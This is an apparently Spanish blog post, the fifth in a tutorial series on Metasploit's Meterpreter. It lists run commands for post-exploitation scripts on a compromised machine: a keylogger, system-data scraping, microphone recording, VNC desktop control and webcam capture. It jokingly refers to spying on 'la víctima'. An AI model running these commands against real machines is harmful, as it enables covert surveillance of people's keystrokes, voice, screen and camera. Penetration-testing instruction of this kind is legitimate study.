lunes, 21 de enero de 2013

Coqueteando con Metasploit: Meterpreter V

  Quinta entrada de meterpreter y segunda del comando run en la que continuaremos viendo más scrips interesantes para extender las funcionalidades de la herramienta y ver las impresionantes posibilidades que ofrece.

Otro keylogger

  Meterpreter ya posee su propio keylogger llamado keyscan, pero con el comando run podemos extender las posibilidades de este con esta versión mas potente llamada keylogrecorder. Su utilización es muy sencilla:
run keylogrecorder

 Los archivos con la información interceptada se encuentran en /root/.msf4/logs/scripts/keylogrecorder.



Obteniendo información del sistema

  Otro de los scripts interesantes es scraper que permite obtener información muy variada y diversa del equipo comprometido almacenándola en una carpeta de forma ordenada.
run scraper

  Los datos obtenidos podemos encontrarlos en  /root/.msf4/logs/scripts/scraper.




Quiero escuchar tu voz ;)

  Con este título tan romántico os introduzco el script sound_recorder que realizará grabaciones del equipo comprometido utilizando el micrófono de éste (si tiene obviamente xD)  y las almacenará en /root/logs/sound_recorder.
run sound_recorder -l /root

 El flag -l permite especificar una ruta alternativa para guardar los ficheros.



Que escritorio tan bonito

  La siguiente posibilidad es controlar el equipo comprometido usando VNC, así de simple y directo. Basta con:
run vnc

  Acto seguido se nos abrirá una ventana con el escritorio de la víctima :D .




Quiero verte :D

  Ya solo nos quedaba para terminar de "conocer" a la víctima verla, tan simple como:
run webcam

   Una vez ejecutado el módulo meterpreter nos mostrará desde imágenes capturadas por la webcam hasta una sesión en streaming con ella, todo muy romántico ;).




  Otro post sobre run concluido y penúltimo de meterpreter. En el próximo veremos que sucede cuando se ataca una máquina y no se disponen de privilegios para actuar con total libertinaje en ésta.

Nos leemos en breve ;)

5 0verl0ad Labs: Coqueteando con Metasploit: Meterpreter V   Quinta entrada de meterpreter y segunda del comando run en la que continuaremos viendo más scrips interesantes para extender las funcional...

No hay comentarios:

< >